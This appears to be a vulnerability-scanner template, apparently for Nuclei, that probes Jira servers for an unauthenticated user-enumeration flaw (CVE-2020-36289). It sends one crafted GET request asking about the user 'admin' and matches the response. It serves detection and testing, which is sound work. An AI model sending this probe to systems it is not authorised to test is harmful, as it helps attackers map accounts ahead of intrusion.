id: Jira-Unauth-User-Enumeration-CVE-2020-36289
info:
  name: Jira Unauth User Enumeration (CVE-2020-36289) 
  author: hacktifycs
  severity: low
  description: An adversary can perform a Un-Auth User Enumeration
  reference: unknown
  tags: jira

requests:
  - raw:
      - |+
        GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1
        Host: 
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
    
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'user:admin'
        part: body

      - type: status
        status:
          - 200